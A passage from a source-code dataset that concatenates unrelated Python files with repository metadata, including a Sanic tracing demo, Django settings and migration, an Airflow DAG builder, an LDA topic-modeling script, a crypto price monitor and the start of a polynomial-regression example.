| 226,328,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,131
|
py
|
from sanic import Sanic, response
from sanic.response import json
import aiohttp
import aiozipkin as az
"""
Integrate aiohttp (traced with aiozipkin) into a Sanic app; doc (CHN): https://www.jianshu.com/p/17bc4518b243
"""
host = '127.0.0.1'
port = 8000
zipkin_address = 'http://127.0.0.1:9411/api/v2/spans'
app = Sanic(__name__)
endpoint = az.create_endpoint('sanic_app', ipv4=host, port=port)
@app.listener('before_server_start')
async def init(app, loop):
tracer = await az.create(zipkin_address, endpoint, sample_rate=1.0)
trace_config = az.make_trace_config(tracer)
app.aiohttp_session = aiohttp.ClientSession(trace_configs=[trace_config], loop=loop)
app.tracer = tracer
@app.listener('after_server_stop')
def finish(app, loop):
loop.run_until_complete(app.aiohttp_session.close())
loop.close()
@app.route("/")
async def test(request):
request['aiozipkin_span'] = request
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
print(span)
url = "https://www.163.com"
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
def request_span(request):
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
        kwargs = {
            'http.path': request.path,
            'http.method': request.method,
            'http.route': request.url,
            'peer.ip': request.remote_addr or request.ip,
            'peer.port': request.port,
        }
[span.tag(k, v) for k,v in kwargs.items()]
span.kind(az.SERVER)
return span
@app.route("/2")
async def test2(request):
request['aiozipkin_span'] = request
span = request_span(request)
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
|
[
"jiantao.gao@cityio.cn"
] |
jiantao.gao@cityio.cn
|
b7a6cb5c45e46e496ff9ac7299b59ead5a70c670
|
6809cda579a7c1c88872f566d65f665c2dff20bb
|
/archive3/lib/prediction.py
|
43f01be6f1370c641d2afae4f8720168f3c9e38e
|
[] |
no_license
|
hellojixian/stock-dummy
|
edb3e7447e26ec3e0481c938fcf8f72063d6c850
|
06b352ba3d78ac419e7672b0e6ec630f6f461ae8
|
refs/heads/master
| 2020-06-15T09:11:33.401689
| 2019-11-05T15:46:43
| 2019-11-05T15:46:43
| 195,256,649
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,043
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import sys,os,datetime,time
import gc
# Force-cast to integers to speed up the search; at minimum it cuts memory usage
def optimize_df(df):
int_cols = df.columns[:-2]
float_cols = ['future_profit','future_risk']
df_float = df[float_cols].copy()
df = df.astype('b')
df[float_cols] = df_float
return df
def predict(sample, kb):
start_timestamp = time.time()
future = ['future_profit','future_risk']
def _check_similarity_loss(v, sample):
return np.abs(v-sample).sum()
filters_setting = {
'prev0_change' :[ 0, 0],
'prev1_change' :[ 0, 0],
'prev2_change' :[ 0, 0],
'trend_5' :[ 0, 0],
'trend_10' :[ 0, 0],
'prev0_bar' :[-1, 1],
'trend_30' :[-1, 1],
'pos_5' :[-1, 1],
'pos_10' :[-1, 1],
'pos_30' :[-1, 1],
'prev4_change' :[-1, 1],
'trend_120' :[-1, 1],
'pos_120' :[-1, 1],
'amp_5' :[-2, 2],
'risk_10' :[-1, 1],
'risk_20' :[-2, 2],
'amp_30' :[-3, 3],
'prev0_open_c' :[-2, 2],
'prev1_open_c' :[-2, 2],
'prev1_bar' :[-2, 2],
'prev0_up_line' :[-2, 2],
'prev0_down_line' :[-2, 2],
}
filters = filters_setting.copy()
    factors = list(filters.keys())
    filter_limit = 2    # widen the per-feature tolerance at most this many times
    filter_offest = 1
while filter_offest<filter_limit:
_filter = ""
for f in factors:
offest = np.clip([-filter_offest, filter_offest], filters[f][0], filters[f][1])
_filter += "({}>={}) & ({}<={}) &".format(
f,int(sample[f]+offest[0]),
f,int(sample[f]+offest[1]))
_filter = _filter[:-1]
rs = kb[kb.eval(_filter)].copy()
if len(rs)<=10:
filter_offest +=1
else:
break
pred = pd.Series()
kb_sample_count = rs.shape[0]
reduced_sample_count = 0
if kb_sample_count >10:
pred['result'] = True
rs['similarity_loss'] = rs.apply(func=_check_similarity_loss, args=[sample], raw=True, axis=1)
rs = rs.sort_values(by=['similarity_loss'],ascending=True)
rs = rs[rs.similarity_loss<=15]
rs = rs[:20]
reduced_sample_count = rs.shape[0]
if reduced_sample_count<=2:
pred['result'] = False
for f in future:
pred['{}_mean'.format(f)] = rs[f].mean()
settings = {'med':0.5}
for k in settings:
v = settings[k]
pred['{}_{}'.format(f,k)] = rs[f].quantile(v)
pred['similarity_loss'] = rs['similarity_loss'].max()
else:
pred['result'] = False
pred['similarity_loss'] = float('nan')
pred['samples_count'] = int(kb_sample_count)
pred['reduced_count'] = int(reduced_sample_count)
pred['durtion'] = np.round((time.time() - start_timestamp),2)
return pred
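# Sketch of the widening search used inside predict() (a hypothetical 1-D
# analogue; the real code widens a per-feature tolerance on a DataFrame
# filter until more than 10 knowledge-base rows match):
def widening_match(kb_values, sample_value, min_hits=10, max_offset=2):
    hits = []
    for offset in range(1, max_offset + 1):
        hits = [v for v in kb_values if abs(v - sample_value) <= offset]
        if len(hits) > min_hits:
            break
    return hits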
|
[
"hellojixian@gmail.com"
] |
hellojixian@gmail.com
|
61327de1c6f0afb604104a7376dc24faaed7a103
|
42c6e00741a37d02880f14d49fa6f7d2f484cd22
|
/market_place/article/migrations/0001_initial.py
|
198b81c5bc9d5b6665d8db75449a4c76974684d4
|
[
"MIT"
] |
permissive
|
otherland8/market-place
|
023d34f92809ff61a3ee3e60007c27597b10047f
|
ebf21a77cf9b3998e270ebd2d4422d7ce997e472
|
refs/heads/master
| 2021-01-17T12:47:51.847532
| 2016-07-08T20:20:31
| 2016-07-08T20:20:31
| 59,594,948
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,308
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-08 16:02
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('public', '0005_auto_20160708_1736'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserBid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('current_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9)),
('maximum_bid', models.DecimalField(decimal_places=2, default=0, max_digits=9, null=True)),
('created_date', models.DateTimeField(auto_now=True)),
('last_bid_date', models.DateTimeField()),
('is_smart_bid', models.BooleanField(default=True)),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='public.Article')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"otherland@abv.bg"
] |
otherland@abv.bg
|
c9a09e5b6cfdc643895b716f62e61cddeaf1f9ac
|
fe90bf63c34511ec9a4d7cb5a90957fbbb03a504
|
/boundary_layer/builders/base.py
|
06573b22f26400966c3a38fb8464d794b797405d
|
[
"Apache-2.0"
] |
permissive
|
etsy/boundary-layer
|
778b115f94efc5d50986a289daf3ad265b38926c
|
c29594957c1fb47e308fcc89f7edcefc0797fc89
|
refs/heads/master
| 2023-07-21T17:03:15.769537
| 2023-01-04T14:05:53
| 2023-01-04T14:05:53
| 142,857,095
| 263
| 67
|
Apache-2.0
| 2023-07-19T19:57:04
| 2018-07-30T09:51:52
|
Python
|
UTF-8
|
Python
| false
| false
| 8,829
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2018 Etsy Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from six.moves import filter
from jinja2 import Environment, PackageLoader
from boundary_layer.builders import util
from boundary_layer.logger import logger
from boundary_layer.registry import NodeTypes
from boundary_layer.util import sanitize_operator_name
from boundary_layer.containers import WorkflowMetadata
class DagBuilderBase(object):
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def indent_operators(self):
pass
@abc.abstractmethod
def preamble(self):
pass
@abc.abstractmethod
def epilogue(self):
pass
@staticmethod
def _build_jinja_env():
jenv = Environment(
loader=PackageLoader('boundary_layer', 'builders/templates'),
trim_blocks=True)
jenv.filters['format_value'] = util.format_value
jenv.filters['add_leading_spaces'] = util.add_leading_spaces
jenv.filters['comment'] = util.comment
jenv.filters['sanitize_operator_name'] = sanitize_operator_name
jenv.filters['verbatim'] = util.verbatim
return jenv
def get_jinja_template(self, template_filename):
return self._build_jinja_env().get_template(template_filename)
def get_imports(self):
all_nodes = self.specs.graphs.primary.ordered() + \
[node for graph in self.specs.graphs.secondary
for node in graph.ordered()]
all_imports = [self.dag.get('imports', {})] + \
[node.imports() for node in all_nodes]
objects = {}
modules = set()
for node_imports in all_imports:
modules |= set(node_imports.get('modules', []))
for item in node_imports.get('objects', []):
objects.setdefault(item['module'], set())
objects[item['module']] |= set(item['objects'])
return {
'modules': modules,
'objects': objects,
}
def __init__(
self,
dag,
graph,
reference_path,
specs,
metadata=None,
referring_node=None,
sub_dag_builder=None,
generator_builder=None):
self.dag = dag
self.graph = graph
self.reference_path = reference_path
self.specs = specs
self.metadata = metadata or WorkflowMetadata(None, None)
self.referring_node = referring_node
self.sub_dag_builder = sub_dag_builder
self.generator_builder = generator_builder
@property
def default_task_args(self):
return self.specs.parsed.primary.get('default_task_args', {})
def build_dag_id(self):
return util.construct_dag_name(self.reference_path)
def render_operator(self, node):
template_filename = None
if node.type == NodeTypes.GENERATOR:
template_filename = 'generator_operator.j2'
elif node.type == NodeTypes.SUBDAG:
template_filename = 'subdag_operator.j2'
else:
template_filename = 'operator.j2'
template = self.get_jinja_template(template_filename)
# Do not set upstream/downstream dependencies that involve generator nodes
# at this stage; those are all set within the generator nodes, and if they are
# set here, there will be python errors due to references to operators that
# do not exist (generators do not correspond to operators)
generator_nodes = frozenset(
gen.name for gen in self.graph.graph.nodes
if gen.type == NodeTypes.GENERATOR)
upstream_deps = frozenset(
dep.name for dep in self.graph.upstream_dependency_set(node))
if generator_nodes & upstream_deps:
logger.debug(
'Not passing upstream generator dependencies `%s` to '
'operator template for node `%s`',
generator_nodes & upstream_deps,
node.name)
downstream_deps = frozenset(
dep.name for dep in self.graph.downstream_dependency_set(node))
if generator_nodes & downstream_deps:
logger.debug(
'Not passing downstream generator dependencies `%s` to '
'operator template for node `%s`',
generator_nodes & downstream_deps,
node.name)
return template.render(
node=node,
args=node.operator_args,
upstream_dependencies=list(upstream_deps - generator_nodes),
downstream_dependencies=list(downstream_deps - generator_nodes),
)
def get_secondary_dag(self, target):
hits = [dag for dag in self.specs.parsed.secondary
if dag['name'] == target]
if not hits:
raise ValueError('Secondary dag id {} not found'.format(target))
if len(hits) > 1:
raise ValueError(
'Multiple hits for secondary dag id {}'.format(target))
return hits[0]
def get_secondary_graph(self, target):
""" Get the graph corresponding to the target. This is kind of ugly,
a consequence of the way in which we currently store dags separately
from graphs. Ideally there would be only one of the two methods,
get_secondary_(dag|graph).
"""
self.get_secondary_dag(target) # does the checking
for (idx, dag) in enumerate(self.specs.parsed.secondary):
if dag['name'] == target:
return self.specs.graphs.secondary[idx]
raise Exception("should not be possible")
def get_target_builder_cls(self, node_type):
if node_type == NodeTypes.GENERATOR:
if not self.generator_builder:
raise Exception('No generator builder is defined!')
return self.generator_builder
elif node_type == NodeTypes.SUBDAG:
if not self.sub_dag_builder:
raise Exception('No sub_dag builder is defined!')
return self.sub_dag_builder
raise Exception(
'Node type `{}` has no known target builder'.format(
node_type))
def render_target(self, node):
builder = self.get_target_builder_cls(node.type)(
dag=self.get_secondary_dag(node.target),
graph=self.get_secondary_graph(node.target),
reference_path=self.reference_path + [node.name],
specs=self.specs,
referring_node=node,
sub_dag_builder=self.sub_dag_builder,
generator_builder=self.generator_builder,
)
return builder.build()
def build(self):
# Keep track of which subdag and generator targets have been rendered.
# These targets can be reused by multiple referring nodes.
rendered_targets = set()
# We build the result by appending components to an array and then
# joining together at the end
components = [self.preamble()]
# generators are rendered last, because they refer to both upstream and
# downstream components when they express their dependencies
generator_components = []
for node in self.graph.ordered():
operator = None
if node.type in set([NodeTypes.GENERATOR, NodeTypes.SUBDAG]) \
and node.target not in rendered_targets:
operator = '\n'.join([
self.render_target(node),
self.render_operator(node)])
rendered_targets.add(node.target)
elif node.type in NodeTypes:
operator = self.render_operator(node)
else:
raise Exception(
'Unrecognized operator type: {}'.format(node.type))
# add the rendered operator to the appropriate components list
(components if node.type != NodeTypes.GENERATOR else generator_components).append(
util.add_leading_spaces(
operator,
1 if self.indent_operators else 0))
components += generator_components
components.append(self.epilogue())
return '\n'.join(filter(None, components))
|
[
"mchalek@gmail.com"
] |
mchalek@gmail.com
|
9ac71ff258e15cccc153cde0ad3f3d89c6d93d2d
|
3850b80059dc5105504c56300dbbc5c70d3ac533
|
/models/__init__.py
|
a495e6c3da7339c6a90a4c7d428ad2be25088dba
|
[] |
no_license
|
haohaom1/intrinsic-images
|
cea56f6991dbdde89dd26621716a08c5f51f7ac4
|
e3e0ddf85b843c3aa93bccf717f80364a15c38b0
|
refs/heads/master
| 2022-12-05T08:37:31.138944
| 2021-08-12T16:07:06
| 2021-08-12T16:07:06
| 193,809,832
| 0
| 3
| null | 2022-11-22T03:59:22
| 2019-06-26T01:45:51
|
Python
|
UTF-8
|
Python
| false
| false
| 34
|
py
|
# file to make this folder a module
|
[
"riallenma@gmail.com"
] |
riallenma@gmail.com
|
7a883866c1dc23352c28cb30226f37e61c4eecf9
|
13884f547752c1f7d5b45d63a8e3aeebaea5a591
|
/newsproject/newsproject/settings.py
|
43da654da7fedf2f86c2779e0e66d4df147839d2
|
[] |
no_license
|
azharashra05/newsapp_repo
|
5139a7d33767b43b83ebc255aa40f2ee6dc17efc
|
e487ae15f103aa3e0d7b4b405f1c6e2a729ffeb3
|
refs/heads/master
| 2022-12-10T21:07:49.371475
| 2020-09-05T07:57:28
| 2020-09-05T07:57:28
| 293,029,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,253
|
py
|
"""
Django settings for newsproject project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR=os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ak9*^19hq5aeh9+i=v4#3vm7_@tce4i#bf5d!hfw_camqsz0re'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'newsapp'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'newsproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'newsproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
STATIC_DIR,
]
|
[
"azharashraf05@gmail.com"
] |
azharashraf05@gmail.com
|
ec782cbc862fb7d8fded12eba2199a87bd70e120
|
b186f73f14b5e93e763bc284cc0ca5737ad40c4a
|
/blog/forms.py
|
aa355e8bb86cd10ec6099e3cf945812cc5097ee6
|
[] |
no_license
|
basmaaitbelarbi/blog_django
|
ba667174ecd7209c49b00a48e7f42b4fdf92c96d
|
af763b2db0704c9d41c2d3355a30f29b30ef8bf5
|
refs/heads/master
| 2021-05-23T14:41:36.841520
| 2020-04-24T00:25:03
| 2020-04-24T00:25:03
| 253,344,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
from django import forms
from .models import Comment, Post
class NewComment(forms.ModelForm):
class Meta:
model = Comment
fields = ('name', 'email', 'body')
class PostCreateForm(forms.ModelForm):
title = forms.CharField(label='title')
content = forms.CharField(label='content', widget=forms.Textarea)
class Meta:
model = Post
fields = ['title', 'content']
|
[
"basmaaitbelarbi@gmail.com"
] |
basmaaitbelarbi@gmail.com
|
3ec32164666ac523827540b3380e72da6133f4c2
|
0d73e045f83f1765b9d598f9cebb2ec328353c99
|
/15A Reading the Program.py
|
89eeeace4a4fbac67b9fb6dd0f9013bfac0e2e2d
|
[] |
no_license
|
Jalbanese1441/Waterloo-CS-Circles-Solutions
|
642553db986cf7d53af133eb79a9abc097107a91
|
0506e2f7f62ec9ff4a5fc412b0526995164844ab
|
refs/heads/master
| 2023-02-01T18:09:57.375959
| 2020-12-18T23:50:18
| 2020-12-18T23:50:18
| 277,946,727
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
def getBASIC():
    # Read lines until one ends with "END", keeping every line (inclusive).
    holder = []
    x = ""
    while not x.endswith("END"):
        x = input()
        holder.append(x)
    return holder
|
[
"67984785+Jalbanese1441@users.noreply.github.com"
] |
67984785+Jalbanese1441@users.noreply.github.com
|
15b6ae2d70b9799cb8748159e727ba2aff01ca67
|
a7b4bd1db26f71ab941076691d894583e167a3fd
|
/tools/cli_auto_doc.py
|
3fa4e46f23cc9b1663fdece8826ea5510b80263b
|
[
"Apache-2.0"
] |
permissive
|
Mirantis/stackalytics
|
c422ccb27baa3f1fd7e68b9732ba0203144a3657
|
96ec7c6c630a9f2532b808069e045d434bbac200
|
refs/heads/master
| 2021-01-18T21:58:38.904481
| 2017-01-25T11:14:12
| 2017-01-25T11:14:12
| 10,863,780
| 3
| 4
|
Apache-2.0
| 2020-02-26T11:45:53
| 2013-06-22T11:17:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,806
|
py
|
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
def split_multiline(value):
value = [element for element in
(line.strip() for line in value.split('\n'))
if element]
return value
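# e.g. split_multiline('\n  console_scripts =\n  foo = bar:main\n')
# -> ['console_scripts =', 'foo = bar:main']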
def get_entry_points(config):
if 'entry_points' not in config:
return {}
return dict((option, split_multiline(value))
for option, value in config['entry_points'].items())
def make(cfg, dest):
parser = configparser.RawConfigParser()
parser.read(cfg)
config = {}
for section in parser.sections():
config[section] = dict(parser.items(section))
entry_points = get_entry_points(config)
console_scripts = entry_points.get('console_scripts')
if console_scripts:
for item in console_scripts:
tool = item.split('=')[0].strip()
print('Running %s' % tool)
os.system('%(tool)s --help > %(dest)s/%(tool)s.txt' %
dict(tool=tool, dest=dest))
if len(sys.argv) < 2:
print('Usage: cli_auto_doc <dest folder>')
sys.exit(1)
print('Generating docs from help to console tools')
make(cfg='setup.cfg', dest=sys.argv[1])
|
[
"ishakhat@mirantis.com"
] |
ishakhat@mirantis.com
|
58893a54c197fb68eeb0d035302bf64d8d6e53e9
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/3/gD3.py
|
aa7152104068969fce4fab0f59d40adbf339df10
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018
| 2016-11-13T20:45:50
| 2016-11-13T20:45:50
| 73,624,224
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'gD3':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
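# Example (hypothetical input file): a line reading
#   gD3 " hello world "
# tokenizes to ['gD3', '"', 'hello', 'world', '"'] and prints: hello world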
|
[
"juliettaylorswift@gmail.com"
] |
juliettaylorswift@gmail.com
|
1a8b3763c8a94e48cf8da659c686babc72716600
|
80abe7427ca501da06a9507cefa52d5c290f2833
|
/Chapter04/topic_modeling.py
|
841891d56168915143ec57282aeab11713c75372
|
[] |
no_license
|
CodedQuen/Raspberry-Pi-3-Cookbook-for-Python-Programmers
|
7910c9cf9ebaf6f42510bd531bf965fd03e6efe8
|
4a77452c4510fd9c7da62099a93fdbc95a86245a
|
refs/heads/master
| 2022-06-10T04:36:59.316284
| 2020-05-05T10:18:33
| 2020-05-05T10:18:33
| 261,421,883
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,220
|
py
|
from nltk.tokenize import RegexpTokenizer
from nltk.stem.snowball import SnowballStemmer
from gensim import models, corpora
from nltk.corpus import stopwords
# Load input words
def load_words(in_file):
element = []
with open(in_file, 'r') as f:
for line in f.readlines():
element.append(line[:-1])
return element
# Class for text preprocessing
class Preprocedure(object):
# Initialize various operators
def __init__(self):
# Create a regular expression tokenizer
self.tokenizer = RegexpTokenizer(r'\w+')
# get the list of stop words
self.english_stop_words= stopwords.words('english')
# Create a Snowball stemmer
self.snowball_stemmer = SnowballStemmer('english')
# Tokenizing, stop word removal, and stemming
def procedure(self, in_data):
# Tokenize the string
token = self.tokenizer.tokenize(in_data.lower())
# Remove the stop words
tokenized_stopwords = [x for x in token if not x in self.english_stop_words]
# Perform stemming on the tokens
token_stemming = [self.snowball_stemmer.stem(x) for x in tokenized_stopwords]
return token_stemming
if __name__=='__main__':
# File containing linewise input data
in_file = 'data_topic_modeling.txt'
# Load words
element = load_words(in_file)
# Create a preprocedure object
preprocedure = Preprocedure()
# Create a list for processed documents
processed_tokens = [preprocedure.procedure(x) for x in element]
# Create a dictionary based on the tokenized documents
dict_tokens = corpora.Dictionary(processed_tokens)
corpus = [dict_tokens.doc2bow(text) for text in processed_tokens]
# Generate the LDA model based on the corpus we just created
num_of_topics = 2
num_of_words = 4
ldamodel = models.ldamodel.LdaModel(corpus,
num_topics=num_of_topics, id2word=dict_tokens, passes=25)
print "Most contributing words to the topics:"
for item in ldamodel.print_topics(num_topics=num_of_topics, num_words=num_of_words):
print "\nTopic", item[0], "==>", item[1]
|
[
"noreply@github.com"
] |
CodedQuen.noreply@github.com
|
be1bf8bedb3397c20eaccb3b6536f27ed3bc8b82
|
aab904ff48ee50db955ec844e5663a64404a1042
|
/gemini.py
|
8d0795d7c7c3de2e37d8d6b183f5eaf3dfa8072f
|
[] |
no_license
|
walazdev/GeminiChallenge
|
b5bd82aefe2768b949589793a5c526e3e78893d5
|
459d38385c84697f188893b8d5f8e07cec29b4d2
|
refs/heads/main
| 2023-04-01T17:19:21.405599
| 2021-03-22T17:37:19
| 2021-03-22T17:37:19
| 350,207,460
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,733
|
py
|
import requests, json, sys, time, datetime
def main():
    # Check the argument count before touching sys.argv[1], so a missing
    # argument prints usage instead of raising IndexError.
    if len(sys.argv) != 2:
        print("Usage: python3 gemini.py [% threshold]")
        sys.exit(1)
    userInput = sys.argv[1]
    try:
        userInputFloat = float(userInput)
    except ValueError:
        print("Usage: python3 gemini.py [% threshold]")
        print("[% threshold] has to be a number")
        sys.exit(1)
    print("User % change threshold:", sys.argv[1])
# get tickers and sort by alphabetical order
print(datetime.datetime.now(), "- INFO: Retrieving tickers")
ticker_url = "https://api.gemini.com/v1/symbols"
response = requests.get(ticker_url)
tickers = sorted(response.json())
while True:
for i in range (0, len(tickers)):
# Get general information about specific ticker from list of tickers.
# The information that will be of use is: open price (opening price 24hr ago), ask (current best offer)
timestamp = datetime.datetime.now()
specificTicker = tickers[i]
tickerURL = "https://api.gemini.com/v2/ticker/" + specificTicker
tickerInfo = requests.get(tickerURL).json()
# On 3/22/2021, 7 more tickers were added, some of which had no information (or None) in certain keys
# The code below is to account for these new tickers without information, as the code would throw errors if no information was present
if tickerInfo['ask'] == None:
continue
print(timestamp, "- INFO: Fetched", specificTicker, "information")
# uncomment line below to adhere to API rate limits
# time.sleep(1.0)
# Retrieve and compute price information
openPrice = float(tickerInfo['open'])
currentPrice = float(tickerInfo['ask'])
percentPriceChange = get24hrPriceChange(currentPrice, openPrice)
# Price change threshold exceeded
if abs(percentPriceChange) > userInputFloat:
print(timestamp, "- ERROR:", specificTicker, "***** PRICE CHANGE *****")
# Price change threshold NOT exceeded (in either direction, +/-)
else:
print(timestamp, "- INFO:", specificTicker, "has not exceeded threshold")
# Print general information on the ticker of interest, regardless of price change status
print(timestamp, "|", specificTicker, "| Current price:", currentPrice, "| Open price:", openPrice, "| % change:", round(percentPriceChange, 2))
def get24hrPriceChange(finalPrice, startPrice):
result = ((finalPrice - startPrice) / startPrice) * 100
return result
if __name__ == "__main__":
main()
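# Worked example (sketch): get24hrPriceChange(105.0, 100.0)
# = ((105.0 - 100.0) / 100.0) * 100 = 5.0 (a +5% move), and
# get24hrPriceChange(95.0, 100.0) = -5.0, so the abs() check above
# catches moves in either direction.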
|
[
"willzs@umich.edu"
] |
willzs@umich.edu
|
8330dd686199cc1515e5595364a6d6fc22e245f6
|
5d9105fc2b36967ae99a09649021cdcaf71a72ed
|
/Project1_804587205_204617837_004589213_204587029/polynomial/plot_underfitting_overfitting.py
|
349f38db338997e934f086c19f6c5724fb38a987
|
[] |
no_license
|
ishan793/EE239-Big-Data-Analysis
|
2a9e0a126f9054798f67b233f2fc50c5f7380225
|
310080a39f111705b2271a9c61b61b3f5b33e91e
|
refs/heads/master
| 2020-04-09T20:06:38.207491
| 2016-02-28T21:43:03
| 2016-02-28T21:43:03
| 50,261,455
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,557
|
py
|
"""
============================
Underfitting vs. Overfitting
============================
This example demonstrates the problems of underfitting and overfitting and
how we can use linear regression with polynomial features to approximate
nonlinear functions. The plot shows the function that we want to approximate,
which is a part of the cosine function. In addition, the samples from the
real function and the approximations of different models are displayed. The
models have polynomial features of different degrees. We can see that a
linear function (polynomial with degree 1) is not sufficient to fit the
training samples. This is called **underfitting**. A polynomial of degree 4
approximates the true function almost perfectly. However, for higher degrees
the model will **overfit** the training data, i.e. it learns the noise of the
training data.
We evaluate quantitatively **overfitting** / **underfitting** by using
cross-validation. We calculate the mean squared error (MSE) on the validation
set, the higher, the less likely the model generalizes correctly from the
training data.
"""
#print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
from sklearn import cross_validation
import pickle
from sklearn.metrics import mean_squared_error
np.random.seed(0)
#data = pickle.load( open( "housing_data.pickle", "rb" ) )
data=pickle.load(open('network.pickle','rb'))
X=np.array(data['x'],dtype='float')
y=np.array(data['y'],dtype='float')
print X.shape
n_samples=X.shape[0]
y=np.reshape(y,(n_samples,1))
print y.shape
degrees = [1]
avg_score=[]
fixed_score=[]
X_test = X[0:50, :]
y_test = y[0:50, :]
X_train = X[50:, :]
y_train = y[50:, :]
#plt.figure(figsize=(14, 5))
'''for i in range(len(degrees)):
